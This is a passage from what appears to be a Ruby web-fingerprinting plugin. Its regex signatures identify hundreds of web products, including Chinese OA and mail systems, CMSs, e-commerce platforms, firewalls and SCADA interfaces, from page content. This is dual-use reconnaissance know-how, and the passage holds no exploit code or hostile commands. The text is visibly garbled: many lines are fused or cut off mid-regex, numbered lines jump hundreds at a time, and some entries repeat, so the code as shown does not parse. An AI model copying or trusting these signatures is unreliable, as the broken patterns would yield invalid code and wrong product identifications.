:string=>"智睿软件"} if @body=~/content="智睿软件/ || @body=~/Zhirui\.js/ 119 | m << { :name=>"Apabi数字资源平台", :string=>"Apabi数字资源平台"} if @body=~/Default\/apabi\.css/ || @body=~/"Fortinet Firewall"} if @title=~/Firewall Notification/ 121 | m << { :name=>"WDlinux", :string=>"WDlinux"} if @title=~/wdOS/ 122 | m << { :name=>"小脑袋", :string=>"小脑袋"} if @body=~/http:\/\/stat\.xiaonaodai\.com\/stat\.php/ 123 | m << { :name=>"天融信ADS管理平台", :string=>"天融信ADS管理平台"} if @title=~/天融信ADS管理平台/ 124 | m << { :name=>"天融信异常流量管理与抗拒绝服务系统", :string=>"天融信异常流量管理与抗拒绝服务系统"} if @title=~/天融信异常流量管理与抗拒绝服务系统/ 125 | m << { :name=>"天融信网络审计系统", :string=>"天融信网络审计系统"} if @body=~/onclick="dlg_download\(\)/ 126 | m << { :name=>"天融信脆弱性扫描与管理系统", :string=>"天融信脆弱性扫描与管理系统"} if @title=~/天融信脆弱性扫描与管理系统/ || @body=~/\/js\/report\/horizontalReportPanel\.js/ 127 | m << { :name=>"AllNewsManager_NET", :string=>"AllNewsManager_NET"} if @body=~/Powered by/ && @body=~/AllNewsManager/ 128 | m << { :name=>"Advanced-Image-Hosting-Script", :string=>"Advanced-Image-Hosting-Script"} if (@body=~/Powered by/ && @body=~/yabsoft\.com/ ) || @body=~/Welcome to install AIHS Script/ 129 | m << { :name=>"SNB股票交易软件", :string=>"SNB股票交易软件"} if @body=~/Copyright 2005–2009 "AChecker Web accessibility evaluation tool"} if @body=~/AChecker is a Web accessibility/ || @title=~/Checker : Web Accessibility Checker/ 131 | m << { :name=>"SCADAPLC", :string=>"SCADAPLC"} if @body=~/\/images\/rockcolor\.gif/ || @body=~/\/ralogo\.gif/ || @body=~/Ethernet Processor/ 132 | m << { :name=>".NET", :string=>".NET"} if @body=~/content="Visual Basic \.NET 7\.1/ 133 | m << { :name=>"phpmoadmin", :string=>"phpmoadmin"} if @title=~/phpmoadmin/ 134 | m << { :name=>"SOMOIDEA", :string=>"SOMOIDEA"} if @body=~/DESIGN BY SOMOIDEA/ 135 | m << { :name=>"Apache-Archiva", :string=>"Apache-Archiva"} if @title=~/Apache Archiva/ || @body=~/\/archiva\.js/ || @body=~/\/archiva\.css/ 136 | m << { :name=>"AM4SS", :string=>"AM4SS"} if @body=~/Powered by am4ss/ || @body=~/am4ss\.css/ 137 | m << { :name=>"ASPThai_Net-Webboard", :string=>"ASPThai_Net-Webboard"} if @body=~/ASPThai\.Net Webboard/ 138 | m << { :name=>"Astaro-Command-Center", :string=>"Astaro-Command-Center"} if @body=~/\/acc_aggregated_reporting\.js/ || @body=~/\/js\/_variables_from_backend\.js?/ 139 | m << { :name=>"ASP-Nuke", :string=>"ASP-Nuke"} if @body=~/CONTENT="ASP-Nuke/ || @body=~/content="ASPNUKE/ 140 | m << { :name=>"ASProxy", :string=>"ASProxy"} if @body=~/Surf the web invisibly using ASProxy power/ || @body=~/btnASProxyDisplayButton/ 141 | m << { :name=>"ashnews", :string=>"ashnews"} if @body=~/powered by/ && @body=~/ashnews/ 142 | m << { :name=>"Arab-Portal", :string=>"Arab-Portal"} if @body=~/Powered by: Arab/ 143 | m << { :name=>"AppServ", :string=>"AppServ"} if @body=~/appserv\/softicon\.gif/ || @body=~/index\.php?appservlang=th/ 144 | m << { :name=>"VZPP Plesk", :string=>"VZPP Plesk"} if @title=~/VZPP Plesk / 145 | m << { :name=>"ApPHP-Calendar", :string=>"ApPHP-Calendar"} if @body=~/This script was generated by ApPHP Calendar/ 146 | m << { :name=>"BigDump", :string=>"BigDump"} if @title=~/BigDump/ || @body=~/BigDump: Staggered MySQL Dump Importer/ 147 | m << { :name=>"BestShopPro", :string=>"BestShopPro"} if @body=~/content="www\.bst\.pl/ 148 | m << { :name=>"BASE", :string=>"BASE"} if @body=~// || @body=~/mailto:base@secureideas\.net/ 149 | m << { :name=>"Basilic", :string=>"Basilic"} if @body=~/\/Software\/Basilic/ 150 | m << { :name=>"Basic-PHP-Events-Lister", :string=>"Basic-PHP-Events-Lister"} if @body=~/Powered by: "AV-Arcade"} if @body=~/Powered by "Auxilium-PetRatePro"} if @body=~/index\.php?cmd=11/ 153 | m << { :name=>"Atomic-Photo-Album", :string=>"Atomic-Photo-Album"} if @body=~/Powered by/ && @body=~/Atomic Photo Album/ 154 | m << { :name=>"Axis-PrintServer", :string=>"Axis-PrintServer"} if @body=~/psb_printjobs\.gif/ || @body=~/\/cgi-bin\/prodhelp\?prod="/ 155 | m << { :name=>"TeamViewer", :string=>"TeamViewer"} if @body=~/This site is running/&&@body=~/TeamViewer/ 156 | m << { :name=>"BlueQuartz", :string=>"BlueQuartz"} if @body=~/VALUE="Copyright \(C\) 2000, Cobalt Networks/ || @title=~/Login - BlueQuartz/ 157 | m << { :name=>"BlueOnyx", :string=>"BlueOnyx"} if @title=~/Login - BlueOnyx/ || @body=~/Thank you for using the BlueOnyx/ 158 | m << { :name=>"BMC-Remedy", :string=>"BMC-Remedy"} if @title=~/Remedy Mid Tier/ 159 | m << { :name=>"BM-Classifieds", :string=>"BM-Classifieds"} if @body=~// 160 | m << { :name=>"Citrix-Metaframe", :string=>"Citrix-Metaframe"} if @body=~/window\.location="\/Citrix\/MetaFrame/ 161 | m << { :name=>"Cogent-DataHub", :string=>"Cogent-DataHub"} if @body=~/\/images\/Cogent\.gif/ || @title=~/Cogent DataHub WebView/ 162 | m << { :name=>"ClipShare", :string=>"ClipShare"} if @body=~// 557 | m << { :name=>"Aardvark Topsites", :string=>"Aardvark Topsites"} if @body=~/Powered by/ && @body=~/Aardvark Topsites/ 558 | m << { :name=>"1024 CMS", :string=>"1024 CMS"} if @body=~/Powered by 1024 CMS/ || @body=~/content="1024 CMS/ 559 | m << { :name=>"68 Classifieds", :string=>"68 Classifieds"} if @body=~/powered by/ && @body=~/68 Classifieds/ 560 | m << { :name=>"武汉弘智科技", :string=>"武汉弘智科技"} if @body=~/研发与技术支持：武汉弘智科技有限公司/ 561 | m << { :name=>"北京金盘鹏图软件", :string=>"北京金盘鹏图软件"} if @body=~/SpeakIntertScarch\.aspx/ 562 | m << { :name=>"育友软件", :string=>"育友软件"} if @body=~/http:\/\/www\.yuysoft\.com\// && @body=~/技术支持/ 563 | m << { :name=>"STcms", :string=>"STcms"} if @body=~/content="STCMS/ || @body=~/DahongY/ 564 | m << { :name=>"青果软件", :string=>"青果软件"} if @title=~/KINGOSOFT/ || @body=~/SetKingoEncypt\.jsp/ || @body=~/\/jkingo\.js/ 565 | m << { :name=>"DirCMS", :string=>"DirCMS"} if @body=~/content="DirCMS/ 566 | m << { :name=>"牛逼cms", :string=>"牛逼cms"} if @body=~/content="niubicms/ 567 | m << { :name=>"南方数据", :string=>"南方数据"} if @body=~/\/SouthidcKeFu\.js/ || @body=~/CONTENT="Copyright 2003-2015 - Southidc\.net/ || @body=~/\/Southidcj2f\.Js/ 568 | m << { :name=>"yidacms", :string=>"yidacms"} if @body=~/yidacms\.css/ 569 | m << { :name=>"bluecms", :string=>"bluecms"} if @body=~/power by bcms/ || @body=~/bcms_plugin/ 570 | m << { :name=>"taocms", :string=>"taocms"} if @body=~/>taoCMS"Tiki-wiki CMS", :string=>"Tiki-wiki CMS"} if @body=~/jqueryTiki = new Object/ 572 | m << { :name=>"lepton-cms", :string=>"lepton-cms"} if @body=~/content="LEPTON-CMS/ || @body=~/Powered by LEPTON CMS/ 573 | m << { :name=>"euse_study", :string=>"euse_study"} if @body=~/UserInfo\/UserFP\.aspx/ 574 | m << { :name=>"沃科网异网同显系统", :string=>"沃科网异网同显系统"} if @body=~/沃科网/ || @title=~/异网同显系统/ 575 | m << { :name=>"Mixcall座席管理中心", :string=>"Mixcall座席管理中心"} if @title=~/Mixcall座席管理中心/ 576 | m << { :name=>"DuomiCms", :string=>"DuomiCms"} if @body=~/DuomiCms/ || @title=~/Power by DuomiCms/ 577 | m << { :name=>"ANECMS", :string=>"ANECMS"} if @body=~/content="Erwin Aligam - ealigam@gmail\.com/ 578 | m << { :name=>"Ananyoo-CMS", :string=>"Ananyoo-CMS"} if @body=~/content="http:\/\/www\.ananyoo\.com/ 579 | m << { :name=>"Amiro-CMS", :string=>"Amiro-CMS"} if @body=~/Powered by: Amiro CMS/ || @body=~/-= Amiro\.CMS \(c\) =-/ 580 | m << { :name=>"AlumniServer", :string=>"AlumniServer"} if @body=~/AlumniServerProject\.php/ || @body=~/content="Alumni/ 581 | m << { :name=>"AlstraSoft-EPay-Enterprise", :string=>"AlstraSoft-EPay-Enterprise"} if @body=~/Powered by EPay Enterprise/ || @body=~/\/shop\.htm?action=view/ 582 | m << { :name=>"AlstraSoft-AskMe", :string=>"AlstraSoft-AskMe"} if @body=~// || (@body=~/Powered by/ && @body=~/http:\/\/www\.alstrasoft\.com/) 583 | m << { :name=>"Artiphp-CMS", :string=>"Artiphp-CMS"} if @body=~/copyright Artiphp/ 584 | m << { :name=>"BIGACE", :string=>"BIGACE"} if @body=~/content="BIGACE/ || @body=~/Site is running BIGACE/ 585 | m << { :name=>"Biromsoft-WebCam", :string=>"Biromsoft-WebCam"} if @title=~/Biromsoft WebCam/ 586 | m << { :name=>"BackBee", :string=>"BackBee"} if @body=~/
"Auto-CMS"} if @body=~/Powered by Auto CMS/ || @body=~/content="AutoCMS/ 588 | m << { :name=>"STAR CMS", :string=>"STAR CMS"} if @body=~/content="STARCMS/ || @body=~/"Zotonic"} if @body=~/powered by: Zotonic/ || @body=~/\/lib\/js\/apps\/zotonic-1\.0/ 590 | m << { :name=>"BloofoxCMS", :string=>"BloofoxCMS"} if @body=~/content="bloofoxCMS/ || @body=~/Powered by "BlognPlus"} if @body=~/Powered by/ && @body=~/href="http:\/\/www\.blogn\.org/ 592 | m << { :name=>"bitweaver", :string=>"bitweaver"} if @body=~/content="bitweaver/ || @body=~/href="http:\/\/www\.bitweaver\.org">Powered by/ 593 | m << { :name=>"ClanSphere", :string=>"ClanSphere"} if @body=~/content="ClanSphere/ || @body=~/index\.php?mod=clansphere&action=about/ 594 | m << { :name=>"CitusCMS", :string=>"CitusCMS"} if @body=~/Powered by CitusCMS/ || @body=~/CitusCMS<\/strong>/ || @body=~/content="CitusCMS/ 595 | m << { :name=>"CMS-WebManager-Pro", :string=>"CMS-WebManager-Pro"} if @body=~/content="Webmanager-pro/ || @body=~/href="http:\/\/webmanager-pro\.com">Web\.Manager/ 596 | m << { :name=>"CMSQLite", :string=>"CMSQLite"} if @body=~/powered by CMSQLite/ || @body=~/content="www\.CMSQLite\.net/ 597 | m << { :name=>"CMSimple", :string=>"CMSimple"} if @body=~/Powered by CMSimple\.dk/ || @body=~/content="CMSimple/ 598 | m << { :name=>"CMScontrol", :string=>"CMScontrol"} if @body=~/content="CMScontrol/ 599 | m << { :name=>"Claroline", :string=>"Claroline"} if @body=~/target="_blank">Claroline<\/a>/ || @body=~/http:\/\/www\.claroline\.net" rel="Copyright/ 600 | m << { :name=>"Car-Portal", :string=>"Car-Portal"} if @body=~/Powered by Car Script/ 601 | m << { :name=>"chillyCMS", :string=>"chillyCMS"} if @body=~/powered by "BoonEx-Dolphin"} if @body=~/Powered by Dolphin - "SilverStripe"} if @body=~/content="SilverStripe/ 604 | m << { :name=>"Campsite", :string=>"Campsite"} if @body=~/content="Campsite/ 605 | m << { :name=>"ischoolsite", :string=>"ischoolsite"} if @body=~/Powered by "CafeEngine"} if @body=~/\/CafeEngine\/style\.css/ || @body=~/CafeEngine\.com/ 607 | m << { :name=>"BrowserCMS", :string=>"BrowserCMS"} if @body=~/Powered by BrowserCMS/ || @body=~/content="BrowserCMS/ 608 | m << { :name=>"Contrexx-CMS", :string=>"Contrexx-CMS"} if @body=~/powered by Contrexx/ || @body=~/content="Contrexx/ 609 | m << { :name=>"ContentXXL", :string=>"ContentXXL"} if @body=~/content="contentXXL/ 610 | m << { :name=>"Contentteller-CMS", :string=>"Contentteller-CMS"} if @body=~/content="Esselbach Contentteller CMS/ 611 | m << { :name=>"Contao", :string=>"Contao"} if @body=~/system\/contao\.css/ 612 | m << { :name=>"CommonSpot", :string=>"CommonSpot"} if @body=~/content="CommonSpot/ 613 | m << { :name=>"CruxCMS", :string=>"CruxCMS"} if @body=~/Created by CruxCMS/ || @body=~/title="CruxCMS" class="blank/ 614 | m << { :name=>"锐商企业CMS", :string=>"锐商企业CMS"} if @body=~/href="\/Writable\/ClientImages\/mycss\.css/ 615 | m << { :name=>"coWiki", :string=>"coWiki"} if @body=~/content="coWiki/ || @body=~// || @body=~/is proudly powered by "BlogEngine_NET"} if @body=~/pics\/blogengine\.ico/ || (@body=~/Powered by/ && @body=~/http:\/\/www\.dotnetblogengine\.net/) 705 | m << { :name=>"boastMachine", :string=>"boastMachine"} if @body=~/powered by boastMachine/ || @body=~/Powered by "BrewBlogger"} if @body=~/developed by "Dotclear"} if @body=~/Powered by "DokuWiki"} if @body=~/powered by DokuWiki/ || @body=~/content="DokuWiki/ || @body=~/
"DeluxeBB"} if @body=~/content="powered by DeluxeBB/ 710 | m << { :name=>"esoTalk", :string=>"esoTalk"} if @body=~/generated by esoTalk/ || @body=~/Powered by esoTalk/ || @body=~/\/js\/esotalk\.js/ 711 | m << { :name=>"Hiki", :string=>"Hiki"} if @body=~/content="Hiki/ || @body=~/\/hiki_base\.css/ || @body=~/by "Gossamer-Forum"} if @body=~/href="gforum\.cgi?username/ || @title=~/Gossamer Forum/ 713 | m << { :name=>"Forest-Blog", :string=>"Forest-Blog"} if @title=~/Forest Blog/ 714 | m << { :name=>"FluxBB", :string=>"FluxBB"} if @body=~/Powered by "Kampyle"} if @body=~/http:\/\/cf\.kampyle\.com\/k_button\.js/ || @body=~/Start Kampyle Feedback Form Button/ 716 | m << { :name=>"KaiBB", :string=>"KaiBB"} if @body=~/Powered by KaiBB/ || @body=~/content="Forum powered by KaiBB/ 717 | m << { :name=>"fangmail", :string=>"fangmail"} if @body=~/\/fangmail\/default\/css\/em_css\.css/ 718 | m << { :name=>"MDaemon", :string=>"MDaemon"} if @body=~/\/WorldClient\.dll?View=Main/ 719 | m << { :name=>"网易企业邮箱", :string=>"网易企业邮箱"} if @body=~/frmvalidator/ && @title=~/邮箱用户登录/ 720 | m << { :name=>"TurboMail", :string=>"TurboMail"} if @body=~/Powered by TurboMail/ || @body=~/wzcon1 clearfix/ || @title=~/TurboMail邮件系统/ 721 | m << { :name=>"万网企业云邮箱", :string=>"万网企业云邮箱"} if @body=~/static\.mxhichina\.com\/images\/favicon\.ico/ 722 | m << { :name=>"bxemail", :string=>"bxemail"} if @title=~/百讯安全邮件系统/ || @title=~/百姓邮局/ || @body=~/请输入正确的电子邮件地址，如：abc@bxemail\.com/ 723 | m << { :name=>"Coremail", :string=>"Coremail"} if @title=~/\/coremail\/common\/assets/ || @title=~/Coremail邮件系统/ 724 | m << { :name=>"Lotus", :string=>"Lotus"} if @title=~/IBM Lotus iNotes Login/ || @body=~/iwaredir\.nsf/ 725 | m << { :name=>"mirapoint", :string=>"mirapoint"} if @body=~/\/wm\/mail\/login\.html/ 726 | m << { :name=>"U-Mail", :string=>"U-Mail"} if @body=~// 727 | m << { :name=>"Spammark邮件信息安全网关", :string=>"Spammark邮件信息安全网关"} if @title=~/Spammark邮件信息安全网关/ || @body=~/\/cgi-bin\/spammark?empty=1/ 728 | m << { :name=>"科信邮件系统", :string=>"科信邮件系统"} if @body=~/\/systemfunction\.pack\.js/ || @body=~/lo_computername/ 729 | m << { :name=>"winwebmail", :string=>"winwebmail"} if @title=~/winwebmail/ || @body=~/WinWebMail Server/ || @body=~/images\/owin\.css/ 730 | m << { :name=>"泰信TMailer邮件系统", :string=>"泰信TMailer邮件系统"} if @title=~/Tmailer/ || @body=~/content="Tmailer/ || @body=~/href="\/tmailer\/img\/logo\/favicon\.ico/ 731 | m << { :name=>"richmail", :string=>"richmail"} if @title=~/Richmail/ || @body=~/\/resource\/se\/lang\/se\/mail_zh_CN\.js/ || @body=~/content="Richmail/ 732 | m << { :name=>"iGENUS邮件系统", :string=>"iGENUS邮件系统"} if @body=~/Copyright by "金笛邮件系统"} if @body=~/\/jdwm\/cgi\/login\.cgi?login/ 734 | m << { :name=>"迈捷邮件系统(MagicMail)", :string=>"迈捷邮件系统(MagicMail)"} if @body=~/\/aboutus\/magicmail\.gif/ 735 | m << { :name=>"Atmail-WebMail", :string=>"Atmail-WebMail"} if @body=~/Powered by Atmail/ || @body=~/\/index\.php\/mail\/auth\/processlogin/ || @body=~/"FormMail"} if @body=~/\/FormMail\.pl/ || @body=~/href="http:\/\/www\.worldwidemart\.com\/scripts\/formmail\.shtml/ 737 | m << { :name=>"同城多用户商城", :string=>"同城多用户商城"} if @body=~/style_chaoshi/ 738 | m << { :name=>"iWebShop", :string=>"iWebShop"} if @body=~/\/runtime\/default\/systemjs/ 739 | m << { :name=>"1und1", :string=>"1und1"} if @body=~/\/shop\/catalog\/browse?sessid/ 740 | m << { :name=>"cart_engine", :string=>"cart_engine"} if @body=~/skins\/_common\/jscripts\.css/ 741 | m << { :name=>"Magento", :string=>"Magento"} if (@body=~/\/skin\/frontend\// && @body=~/BLANK_IMG/) || @body=~/Magento, Varien, E-commerce/ 742 | m << { :name=>"OpenCart", :string=>"OpenCart"} if @body=~/Powered By OpenCart/ || @body=~/catalog\/view\/theme/ 743 | m << { :name=>"hishop", :string=>"hishop"} if @body=~/hishop\.plugins\.openid/ || @body=~/Hishop development team/ 744 | m << { :name=>"Maticsoft_Shop_动软商城", :string=>"Maticsoft_Shop_动软商城"} if @body=~/Maticsoft Shop/ || (@body=~/maticsoft/ && @body=~/\/Areas\/Shop\//) 745 | m << { :name=>"hikashop", :string=>"hikashop"} if @body=~/\/media\/com_hikashop\/css\// 746 | m << { :name=>"tp-shop", :string=>"tp-shop"} if @body=~/mn-c-top/ 747 | m << { :name=>" 海盗云商(Haidao)", :string=>" 海盗云商(Haidao)"} if @body=~/haidao\.web\.general\.js/ 748 | m << { :name=>"shopbuilder", :string=>"shopbuilder"} if @body=~/content="ShopBuilder/ || @body=~/Powered by ShopBuilder/ || @body=~/ShopBuilder版权所有/ 749 | m << { :name=>"v5shop", :string=>"v5shop"} if @title=~/v5shop/ || @body=~/content="V5shop/ || @body=~/Powered by V5Shop/ 750 | m << { :name=>"shopnc", :string=>"shopnc"} if @body=~/Powered by ShopNC/ || @body=~/Copyright 2007-2014 ShopNC Inc/ || @body=~/content="ShopNC/ 751 | m << { :name=>"shopex", :string=>"shopex"} if @body=~/content="ShopEx/ || @body=~/@author litie[aita]shopex\.cn/ 752 | m << { :name=>"dbshop", :string=>"dbshop"} if @body=~/content="dbshop/ 753 | m << { :name=>"任我行电商", :string=>"任我行电商"} if @body=~/content="366EC/ 754 | m << { :name=>"CuuMall", :string=>"CuuMall"} if @body=~/Power by CuuMall/ 755 | m << { :name=>"javashop", :string=>"javashop"} if @body=~/易族智汇javashop/ || @body=~/javashop微信公众号/ || @body=~/content="JavaShop/ 756 | m << { :name=>"TPshop", :string=>"TPshop"} if @body=~/\/index\.php\/Mobile\/Index\/index\.html/ || @body=~/>TPshop开源商城"MvMmall", :string=>"MvMmall"} if @body=~/content="MvMmall/ 758 | m << { :name=>"AirvaeCommerce", :string=>"AirvaeCommerce"} if @body=~/E-Commerce Shopping Cart Software/ 759 | m << { :name=>"AiCart", :string=>"AiCart"} if @body=~/APP_authenticate/ 760 | m << { :name=>"MallBuilder", :string=>"MallBuilder"} if @body=~/content="MallBuilder/ || @body=~/Powered by MallBuilder/ 761 | m << { :name=>"e-junkie", :string=>"e-junkie"} if @body=~/function EJEJC_lc/ 762 | m << { :name=>"Allomani", :string=>"Allomani"} if @body=~/content="Allomani/ || @body=~/Programmed By Allomani/ 763 | m << { :name=>"ASPilot-Cart", :string=>"ASPilot-Cart"} if @body=~/content="Pilot Cart/ || @body=~/\/pilot_css_default\.css/ 764 | m << { :name=>"Axous", :string=>"Axous"} if @body=~/content="Axous/ || @body=~/title="Axous Shareware Shop/ 765 | m << { :name=>"CaupoShop-Classic", :string=>"CaupoShop-Classic"} if @body=~/Powered by CaupoShop/ || @body=~// 772 | m << { :name=>"ICEshop", :string=>"ICEshop"} if @body=~/Powered by ICEshop/ || @body=~/
/ 773 | m << { :name=>"Interspire-Shopping-Cart", :string=>"Interspire-Shopping-Cart"} if @body=~/content="Interspire Shopping Cart/ || @body=~/class="PoweredBy">Interspire Shopping Cart/ 774 | m << { :name=>"iScripts-MultiCart", :string=>"iScripts-MultiCart"} if @body=~/Powered by "华天动力OA(OA8000)"} if @body=~/\/OAapp\/WebObjects\/OAapp\.woa/ 776 | m << { :name=>"通达OA", :string=>"通达OA"} if @body=~// || (@body=~/OA提示：不能登录OA/ && @body=~/紧急通知：今日10点停电/) || @body=~/Office Anywhere 2013/|| @body=~ /通达官网<\/a><\/div>/ 777 | m << { :name=>"OA(a8/seeyon/ufida)", :string=>"OA(a8/seeyon/ufida)"} if @body=~/\/seeyon\/USER-DATA\/IMAGES\/LOGIN\/login\.gif/ 778 | m << { :name=>"yongyoufe", :string=>"yongyoufe"} if @title=~/FE协作/ || (@body=~/V_show/ && @body=~/V_hedden/) 779 | m << { :name=>"pmway_E4_crm", :string=>"pmway_E4_crm"} if @title=~/E4/ && @title=~/CRM/ 780 | m << { :name=>"Dolibarr", :string=>"Dolibarr"} if @body=~/Dolibarr Development Team/ 781 | m << { :name=>"PHPOA", :string=>"PHPOA"} if @body=~/admin_img\/msg_bg\.png/ 782 | m << { :name=>"78oa", :string=>"78oa"} if @body=~/\/resource\/javascript\/system\/runtime\.min\.js/ || @body=~/license\.78oa\.com/ || @title=~/78oa/||@body=~/src="\/module\/index\.php/ 783 | m << { :name=>"WishOA", :string=>"WishOA"} if @body=~/WishOA_WebPlugin\.js/ 784 | m << { :name=>"金和协同管理平台", :string=>"金和协同管理平台"} if @title=~/金和协同管理平台/ 785 | m << { :name=>"Lotus", :string=>"Lotus"} if @title=~/IBM Lotus iNotes Login/ || @body=~/iwaredir\.nsf/ 786 | m << { :name=>"OA企业智能办公自动化系统", :string=>"OA企业智能办公自动化系统"} if @body=~/input name="S1" type="image/ && @body=~/count\/mystat\.asp/ 787 | m << { :name=>"ecwapoa", :string=>"ecwapoa"} if @body=~/ecwapoa/ 788 | m << { :name=>"ezOFFICE", :string=>"ezOFFICE"} if @title=~/Wanhu ezOFFICE/ || @body=~/EZOFFICEUSERNAME/ ||@title=~/万户OA/ || @body=~/whirRootPath/ || @body=~/\/defaultroot\/js\/cookie\.js/ 789 | m << { :name=>"任我行CRM", :string=>"任我行CRM"} if @title=~/任我行CRM/ || @body=~/CRM_LASTLOGINUSERKEY/ 790 | m << { :name=>"信达OA", :string=>"信达OA"} if @body=~/http:\/\/www\.xdoa\.cn<\/a>/ || @body=~/北京创信达科技有限公司/ 791 | m << { :name=>"协众OA", :string=>"协众OA"} if @body=~ /Powered by 协众OA/ || @body=~/admin@cnoa\.cn/ || @body=~/Powered by CNOA\.CN/ 792 | m << { :name=>"soffice", :string=>"soffice"} if @title=~/OA办公管理平台/ 793 | m << { :name=>"海天OA", :string=>"海天OA"} if @body=~/HTVOS\.js/ 794 | m << { :name=>"泛微OA", :string=>"泛微OA"} if @body=~/\/js\/jquery\/jquery_wev8\.js/||@body=~/\/login\/Login\.jsp?logintype=1/ 795 | m << { :name=>"中望OA", :string=>"中望OA"} if @body=~/\/app_qjuserinfo\/qjuserinfoadd\.jsp/ || @body=~/\/IMAGES\/default\/first\/xtoa_logo\.png/ 796 | m << { :name=>"睿博士云办公系统", :string=>"睿博士云办公系统"} if @body=~/\/studentSign\/toLogin\.di/ || @body=~/\/user\/toUpdatePasswordPage\.di/ 797 | m << { :name=>"一米OA", :string=>"一米OA"} if @body=~/\/yimioa\.apk/ 798 | m << { :name=>"泛普建筑工程施工OA", :string=>"泛普建筑工程施工OA"} if @body=~/\/dwr\/interface\/LoginService\.js/ 799 | m << { :name=>"正方OA", :string=>"正方OA"} if @body=~/zfoausername/ 800 | m << { :name=>"希尔OA", :string=>"希尔OA"} if @body=~/\/heeroa\/login\.do/ 801 | m << { :name=>"用友致远oa", :string=>"用友致远oa"} if @body=~/\/seeyon\/USER-DATA\/IMAGES\/LOGIN\/login\.gif/ || @title=~/用友致远A/ || @body=~/\/yyoa\// || @body=~/\/seeyon\/common\/all-min\.js/ 802 | m << { :name=>"WordPress", :string=>"WordPress"} if @body=~/\/wp-login\.php?/||@body=~/wp-user/ 803 | m << { :name=>"宝塔面板", :string=>"宝塔面板"} if @body=~/安全入口校验失败<\/title>/ || @body=~/\/\/www\.bt\.cn\/bbs/ 804 | m << { :name=>"Emlog", :string=>"Emlog"} if @body=~/\/include\/lib\/js\/common_tpl\.js/&&@body=~/content\/templates/ 805 | m << { :name=>"Eyou", :string=>"Eyou"} if @body=~/亿邮电子/ || @body=~/login\.destroy\.session/ 806 | # Return passive matches 807 | m 808 | end 809 | 810 | end 811 | --------------------------------------------------------------------------------